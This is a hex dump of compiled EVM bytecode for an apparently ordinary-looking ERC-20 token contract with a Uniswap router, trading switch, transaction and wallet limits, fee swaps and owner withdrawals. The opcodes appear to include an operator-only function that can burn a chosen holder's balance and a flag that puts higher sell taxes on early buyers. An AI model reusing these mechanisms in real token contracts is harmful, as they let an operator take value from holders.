000000000602082015250565b6000613389602183612a24565b91506133948261332d565b604082019050919050565b600060208201905081810360008301526133b88161337c565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b600061341b602283612a24565b9150613426826133bf565b604082019050919050565b6000602082019050818103600083015261344a8161340e565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006134ad602483612a24565b91506134b882613451565b604082019050919050565b600060208201905081810360008301526134dc816134a0565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061353f602283612a24565b915061354a826134e3565b604082019050919050565b6000602082019050818103600083015261356e81613532565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006135ab601d83612a24565b91506135b682613575565b602082019050919050565b600060208201905081810360008301526135da8161359e565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061363d602583612a24565b9150613648826135e1565b604082019050919050565b6000602082019050818103600083015261366c81613630565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006136cf602383612a24565b91506136da82613673565b604082019050919050565b600060208201905081810360008301526136fe816136c2565b9050919050565b7f54726164696e67206e6f7420656e61626c656400000000000000000000000000600082015250565b600061373b601383612a24565b915061374682613705565b602082019050919050565b6000602082019050818103600083015261376a8161372e565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473207460008201527f6865206d6178207472616e73616374696f6e20616d6f756e7420626566000000602082015250565b60006137cd603d83612a24565b91506137d882613771565b604082019050919050565b600060208201905081810360008301526137fc816137c0565b9050919050565b7f45524332303a2062616c616e636520616d6f756e74206578636565646564206d60008201527f61782077616c6c657420616d6f756e74206c696d697400000000000000000000602082015250565b600061385f603683612a24565b915061386a82613803565b604082019050919050565b6000602082019050818103600083015261388e81613852565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473207460008201527f6865206d6178207472616e73616374696f6e20616d6f756e7400000000000000602082015250565b60006138f1603983612a24565b91506138fc82613895565b604082019050919050565b60006020820190508181036000830152613920816138e4565b9050919050565b6000613932826129e5565b915061393d836129e5565b925082820261394b816129e5565b9150828204841483151761396257613961612e6d565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b60006139a3826129e5565b91506139ae836129e5565b9250826139be576139bd613969565b5b828204905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006139ff602083612a24565b9150613a0a826139c9565b602082019050919050565b60006020820190508181036000830152613a2e816139f2565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000613a91602683612a24565b9150613a9c82613a35565b604082019050919050565b60006020820190508181036000830152613ac081613a84565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b613b5a816129a9565b82525050565b6000613b6c8383613b51565b60208301905092915050565b6000602082019050919050565b6000613b9082613b25565b613b9a8185613b30565b9350613ba583613b41565b8060005b83811015613bd6578151613bbd8882613b60565b9750613bc883613b78565b925050600181019050613ba9565b5085935050505092915050565b600060a082019050613bf860008301886129ef565b613c0560208301876129ef565b8181036040830152613c178186613b85565b9050613c2660608301856129bb565b613c3360808301846129ef565b969550505050505056fea2646970667358221220f0620b75908cef86b78abc4089e5036fc251737fe508d767664e338f17a7810c64736f6c63430008130033
Deployed Bytecode
0x6080604052600436106102085760003560e01c80636225658911610118578063a9059cbb116100a0578063dd62ed3e1161006f578063dd62ed3e1461075f578063e5b37a651461079c578063f2fde38b146107d9578063fb201b1d14610802578063fca675a8146108195761020f565b8063a9059cbb146106a3578063aa4bde28146106e0578063b61b64fa1461070b578063cf865f7f146107365761020f565b80638c0b5e22116100e75780638c0b5e22146105ba5780638da5cb5b146105e557806395d89b4114610610578063a014f37d1461063b578063a457c2d7146106665761020f565b8063622565891461051257806370a0823114610529578063715018a6146105665780638baa82491461057d5761020f565b80632f396cee1161019b578063395093511161016a578063395093511461042b5780633eb5d9b21461046857806349bd5a5e1461049357806349df728c146104be57806354b762a6146104e75761020f565b80632f396cee1461038e5780632fee9e7e14610398578063313ce567146103d557806333ee1793146104005761020f565b8063095ea7b3116101d7578063095ea7b3146102be5780631694505e146102fb57806318160ddd1461032657806323b872dd146103515761020f565b806303fd2a45146102145780630445b6671461023f57806306fdde031461026a5780630828c1dd146102955761020f565b3661020f57005b600080fd5b34801561022057600080fd5b50610229610844565b60405161023691906129ca565b60405180910390f35b34801561024b57600080fd5b5061025461086a565b60405161026191906129fe565b60405180910390f35b34801561027657600080fd5b5061027f610870565b60405161028c9190612aa9565b60405180910390f35b3480156102a157600080fd5b506102bc60048036038101906102b79190612afc565b610902565b005b3480156102ca57600080fd5b506102e560048036038101906102e09190612b55565b610984565b6040516102f29190612bb0565b60405180910390f35b34801561030757600080fd5b506103106109a7565b60405161031d9190612c2a565b60405180910390f35b34801561033257600080fd5b5061033b6109cb565b60405161034891906129fe565b60405180910390f35b34801561035d57600080fd5b5061037860048036038101906103739190612c45565b6109d5565b6040516103859190612bb0565b60405180910390f35b610396610a04565b005b3480156103a457600080fd5b506103bf60048036038101906103ba9190612afc565b610ced565b6040516103cc9190612bb0565b60405180910390f35b3480156103e157600080fd5b506103ea610d0d565b6040516103f79190612cb4565b60405180910390f35b34801561040c57600080fd5b50610415610d16565b60405161042291906129fe565b60405180910390f35b34801561043757600080fd5b50610452600480360381019061044d9190612b55565b610d1c565b60405161045f9190612bb0565b60405180910390f35b34801561047457600080fd5b5061047d610d53565b60405161048a91906129fe565b60405180910390f35b34801561049f57600080fd5b506104a8610d59565b6040516104b591906129ca565b60405180910390f35b3480156104ca57600080fd5b506104e560048036038101906104e09190612afc565b610d7f565b005b3480156104f357600080fd5b506104fc610ea4565b6040516105099190612bb0565b60405180910390f35b34801561051e57600080fd5b50610527610f20565b005b34801561053557600080fd5b50610550600480360381019061054b9190612afc565b610f50565b60405161055d91906129fe565b60405180910390f35b34801561057257600080fd5b5061057b610f98565b005b34801561058957600080fd5b506105a4600480360381019061059f9190612afc565b610fac565b6040516105b19190612bb0565b60405180910390f35b3480156105c657600080fd5b506105cf610fcc565b6040516105dc91906129fe565b60405180910390f35b3480156105f157600080fd5b506105fa610fd2565b60405161060791906129ca565b60405180910390f35b34801561061c57600080fd5b50610625610ffc565b6040516106329190612aa9565b60405180910390f35b34801561064757600080fd5b5061065061108e565b60405161065d9190612bb0565b60405180910390f35b34801561067257600080fd5b5061068d60048036038101906106889190612b55565b6110da565b60405161069a9190612bb0565b60405180910390f35b3480156106af57600080fd5b506106ca60048036038101906106c59190612b55565b611151565b6040516106d79190612bb0565b60405180910390f35b3480156106ec57600080fd5b506106f5611174565b60405161070291906129fe565b60405180910390f35b34801561071757600080fd5b5061072061117a565b60405161072d91906129fe565b60405180910390f35b34801561074257600080fd5b5061075d60048036038101906107589190612cfb565b611180565b005b34801561076b57600080fd5b5061078660048036038101906107819190612d3b565b6111e3565b60405161079391906129fe565b60405180910390f35b3480156107a857600080fd5b506107c360048036038101906107be9190612afc565b61126a565b6040516107d09190612bb0565b60405180910390f35b3480156107e557600080fd5b5061080060048036038101906107fb9190612afc565b61128a565b005b34801561080e57600080fd5b5061081761130d565b005b34801561082557600080fd5b5061082e61139d565b60405161083b9190612df2565b60405180910390f35b600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600b5481565b60606003805461087f90612e3c565b80601f01602080910402602001604051908101604052809291908181526020018280546108ab90612e3c565b80156108f85780601f106108cd576101008083540402835291602001916108f8565b820191906000526020600020905b8154815290600101906020018083116108db57829003601f168201915b5050505050905090565b61090a6113b0565b6000600e60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506109818160145461097284610f50565b61097c9190612e9c565b611449565b50565b60008061098f611616565b905061099c81858561161e565b600191505092915050565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b6000600254905090565b6000806109e0611616565b90506109ed8582856117e7565b6109f8858585611873565b60019150509392505050565b610a0c61222d565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610a77573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a9b9190612ee5565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610b22573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b469190612ee5565b6040518363ffffffff1660e01b8152600401610b63929190612f12565b6020604051808303816000875af1158015610b82573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ba69190612ee5565b601560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550610c31307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff61161e565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663f305d7193430610c7830610f50565b600080610c83610fd2565b426040518863ffffffff1660e01b8152600401610ca596959493929190612f76565b60606040518083038185885af1158015610cc3573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610ce89190612fec565b505050565b600e6020528060005260406000206000915054906101000a900460ff1681565b60006012905090565b60125481565b600080610d27611616565b9050610d48818585610d3985896111e3565b610d43919061303f565b61161e565b600191505092915050565b60115481565b601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b610d8761222d565b8073ffffffffffffffffffffffffffffffffffffffff1663a9059cbb600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b8152600401610dff91906129ca565b602060405180830381865afa158015610e1c573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e409190613073565b6040518363ffffffff1660e01b8152600401610e5d9291906130a0565b6020604051808303816000875af1158015610e7c573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ea091906130de565b5050565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc6017549081150290604051600060405180830381858888f19350505050158015610f10573d6000803e3d6000fd5b5060006017819055506001905090565b610f2861222d565b6b033b2e3c9fd0803ce80000006009819055506b033b2e3c9fd0803ce8000000600a81905550565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610fa061222d565b610faa60006122ab565b565b600f6020528060005260406000206000915054906101000a900460ff1681565b60095481565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606004805461100b90612e3c565b80601f016020809104026020016040519081016040528092919081815260200182805461103790612e3c565b80156110845780601f1061105957610100808354040283529160200191611084565b820191906000526020600020905b81548152906001019060200180831161106757829003601f168201915b5050505050905090565b600061109861222d565b6003601060006101000a81548160ff021916908360038111156110be576110bd612d7b565b5b0217905550600060118190555060006012819055506001905090565b6000806110e5611616565b905060006110f382866111e3565b905083811015611138576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161112f9061317d565b60405180910390fd5b611145828686840361161e565b60019250505092915050565b60008061115c611616565b9050611169818585611873565b600191505092915050565b600a5481565b60175481565b61118861222d565b80600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600d6020528060005260406000206000915054906101000a900460ff1681565b61129261222d565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611301576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112f89061320f565b60405180910390fd5b61130a816122ab565b50565b61131561222d565b601060029054906101000a900460ff1615611365576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161135c9061327b565b60405180910390fd5b6001601060026101000a81548160ff0219169083151502179055506001601060036101000a81548160ff021916908315150217905550565b601060009054906101000a900460ff1681565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166113f1611616565b73ffffffffffffffffffffffffffffffffffffffff1614611447576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161143e9061330d565b60405180910390fd5b565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036114b8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114af9061339f565b60405180910390fd5b6114c482600083612371565b60008060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561154a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161154190613431565b60405180910390fd5b8181036000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008282540392505081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516115fd91906129fe565b60405180910390a361161183600084612376565b505050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361168d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611684906134c3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036116fc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116f390613555565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516117da91906129fe565b60405180910390a3505050565b60006117f384846111e3565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461186d578181101561185f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611856906135c1565b60405180910390fd5b61186c848484840361161e565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036118e2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118d990613653565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611951576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611948906136e5565b60405180910390fd5b600d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156119f55750600d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611a4a57601060029054906101000a900460ff16611a49576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a4090613751565b60405180910390fd5b5b600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015611aee5750600e60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611be757601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614611be657600954811115611b8d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b84906137e3565b60405180910390fd5b600a54611b9983610f50565b82611ba4919061303f565b1115611be5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bdc90613875565b60405180910390fd5b5b5b6000819050600d60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015611c905750600d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561221c57601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161480611d3e5750601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b1561212e57600954821115611d88576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d7f90613907565b60405180910390fd5b8373ffffffffffffffffffffffffffffffffffffffff16601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16148015611e2f5750600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015611e6757503073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b15611f395760006003811115611e8057611e7f612d7b565b5b601060009054906101000a900460ff166003811115611ea257611ea1612d7b565b5b03611f00576001600f60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b6000606460115484611f129190613927565b611f1c9190613998565b9050611f2985308361237b565b8083611f359190612e9c565b9150505b8273ffffffffffffffffffffffffffffffffffffffff16601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16148015611fe05750600e60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b801561201857503073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b80156120305750601060039054906101000a900460ff165b80156120495750601060019054906101000a900460ff16155b15612129576000601254905060011515600f60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161515036120b35760135490505b6001601060016101000a81548160ff0219169083151502179055506120d66125f1565b6000601060016101000a81548160ff0219169083151502179055506000606482856121019190613927565b61210b9190613998565b905061211886308361237b565b80846121249190612e9c565b925050505b61221b565b60011515600f60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615151480156121dc57508273ffffffffffffffffffffffffffffffffffffffff16601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b1561221a5760006064601354846121f39190613927565b6121fd9190613998565b905061220a85308361237b565b80836122169190612e9c565b9150505b5b5b61222784848361237b565b50505050565b612235611616565b73ffffffffffffffffffffffffffffffffffffffff16612253610fd2565b73ffffffffffffffffffffffffffffffffffffffff16146122a9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122a090613a15565b60405180910390fd5b565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036123ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016123e190613653565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612459576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612450906136e5565b60405180910390fd5b612464838383612371565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156124ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016124e190613aa7565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516125d891906129fe565b60405180910390a36125eb848484612376565b50505050565b60006125fc30610f50565b03156126b65760008061260e30610f50565b905060004790506000612642600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16610f50565b90506000600b548411156126b05747925061265e8460006126b8565b824761266a9190612e9c565b9450600b548211156126965780612682576000612684565b845b8561268f9190613998565b6017819055505b84601760008282546126a8919061303f565b925050819055505b50505050505b565b6000600267ffffffffffffffff8111156126d5576126d4613ac7565b5b6040519080825280602002602001820160405280156127035781602001602082028036833780820191505090505b509050308160008151811061271b5761271a613af6565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156127c0573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906127e49190612ee5565b816001815181106127f8576127f7613af6565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250503073ffffffffffffffffffffffffffffffffffffffff1663095ea7b37f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b81526004016128ad9291906130a0565b6020604051808303816000875af11580156128cc573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906128f091906130de565b507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663791ac94784848430426040518663ffffffff1660e01b8152600401612952959493929190613be3565b600060405180830381600087803b15801561296c57600080fd5b505af1158015612980573d6000803e3d6000fd5b50505050505050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006129b482612989565b9050919050565b6129c4816129a9565b82525050565b60006020820190506129df60008301846129bb565b92915050565b6000819050919050565b6129f8816129e5565b82525050565b6000602082019050612a1360008301846129ef565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015612a53578082015181840152602081019050612a38565b60008484015250505050565b6000601f19601f8301169050919050565b6000612a7b82612a19565b612a858185612a24565b9350612a95818560208601612a35565b612a9e81612a5f565b840191505092915050565b60006020820190508181036000830152612ac38184612a70565b905092915050565b600080fd5b612ad9816129a9565b8114612ae457600080fd5b50565b600081359050612af681612ad0565b92915050565b600060208284031215612b1257612b11612acb565b5b6000612b2084828501612ae7565b91505092915050565b612b32816129e5565b8114612b3d57600080fd5b50565b600081359050612b4f81612b29565b92915050565b60008060408385031215612b6c57612b6b612acb565b5b6000612b7a85828601612ae7565b9250506020612b8b85828601612b40565b9150509250929050565b60008115159050919050565b612baa81612b95565b82525050565b6000602082019050612bc56000830184612ba1565b92915050565b6000819050919050565b6000612bf0612beb612be684612989565b612bcb565b612989565b9050919050565b6000612c0282612bd5565b9050919050565b6000612c1482612bf7565b9050919050565b612c2481612c09565b82525050565b6000602082019050612c3f6000830184612c1b565b92915050565b600080600060608486031215612c5e57612c5d612acb565b5b6000612c6c86828701612ae7565b9350506020612c7d86828701612ae7565b9250506040612c8e86828701612b40565b9150509250925092565b600060ff82169050919050565b612cae81612c98565b82525050565b6000602082019050612cc96000830184612ca5565b92915050565b612cd881612b95565b8114612ce357600080fd5b50565b600081359050612cf581612ccf565b92915050565b60008060408385031215612d1257612d11612acb565b5b6000612d2085828601612ae7565b9250506020612d3185828601612ce6565b9150509250929050565b60008060408385031215612d5257612d51612acb565b5b6000612d6085828601612ae7565b9250506020612d7185828601612ae7565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602160045260246000fd5b60048110612dbb57612dba612d7b565b5b50565b6000819050612dcc82612daa565b919050565b6000612ddc82612dbe565b9050919050565b612dec81612dd1565b82525050565b6000602082019050612e076000830184612de3565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680612e5457607f821691505b602082108103612e6757612e66612e0d565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000612ea7826129e5565b9150612eb2836129e5565b9250828203905081811115612eca57612ec9612e6d565b5b92915050565b600081519050612edf81612ad0565b92915050565b600060208284031215612efb57612efa612acb565b5b6000612f0984828501612ed0565b91505092915050565b6000604082019050612f2760008301856129bb565b612f3460208301846129bb565b9392505050565b6000819050919050565b6000612f60612f5b612f5684612f3b565b612bcb565b6129e5565b9050919050565b612f7081612f45565b82525050565b600060c082019050612f8b60008301896129bb565b612f9860208301886129ef565b612fa56040830187612f67565b612fb26060830186612f67565b612fbf60808301856129bb565b612fcc60a08301846129ef565b979650505050505050565b600081519050612fe681612b29565b92915050565b60008060006060848603121561300557613004612acb565b5b600061301386828701612fd7565b935050602061302486828701612fd7565b925050604061303586828701612fd7565b9150509250925092565b600061304a826129e5565b9150613055836129e5565b925082820190508082111561306d5761306c612e6d565b5b92915050565b60006020828403121561308957613088612acb565b5b600061309784828501612fd7565b91505092915050565b60006040820190506130b560008301856129bb565b6130c260208301846129ef565b9392505050565b6000815190506130d881612ccf565b92915050565b6000602082840312156130f4576130f3612acb565b5b6000613102848285016130c9565b91505092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000613167602583612a24565b91506131728261310b565b604082019050919050565b600060208201905081810360008301526131968161315a565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006131f9602683612a24565b91506132048261319d565b604082019050919050565b60006020820190508181036000830152613228816131ec565b9050919050565b7f54726164696e6720697320616c726561647920656e61626c6564000000000000600082015250565b6000613265601a83612a24565b91506132708261322f565b602082019050919050565b6000602082019050818103600083015261329481613258565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f7065726160008201527f746f720000000000000000000000000000000000000000000000000000000000602082015250565b60006132f7602383612a24565b91506133028261329b565b604082019050919050565b60006020820190508181036000830152613326816132ea565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000613389602183612a24565b91506133948261332d565b604082019050919050565b600060208201905081810360008301526133b88161337c565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b600061341b602283612a24565b9150613426826133bf565b604082019050919050565b6000602082019050818103600083015261344a8161340e565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006134ad602483612a24565b91506134b882613451565b604082019050919050565b600060208201905081810360008301526134dc816134a0565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061353f602283612a24565b915061354a826134e3565b604082019050919050565b6000602082019050818103600083015261356e81613532565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006135ab601d83612a24565b91506135b682613575565b602082019050919050565b600060208201905081810360008301526135da8161359e565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061363d602583612a24565b9150613648826135e1565b604082019050919050565b6000602082019050818103600083015261366c81613630565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006136cf602383612a24565b91506136da82613673565b604082019050919050565b600060208201905081810360008301526136fe816136c2565b9050919050565b7f54726164696e67206e6f7420656e61626c656400000000000000000000000000600082015250565b600061373b601383612a24565b915061374682613705565b602082019050919050565b6000602082019050818103600083015261376a8161372e565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473207460008201527f6865206d6178207472616e73616374696f6e20616d6f756e7420626566000000602082015250565b60006137cd603d83612a24565b91506137d882613771565b604082019050919050565b600060208201905081810360008301526137fc816137c0565b9050919050565b7f45524332303a2062616c616e636520616d6f756e74206578636565646564206d60008201527f61782077616c6c657420616d6f756e74206c696d697400000000000000000000602082015250565b600061385f603683612a24565b915061386a82613803565b604082019050919050565b6000602082019050818103600083015261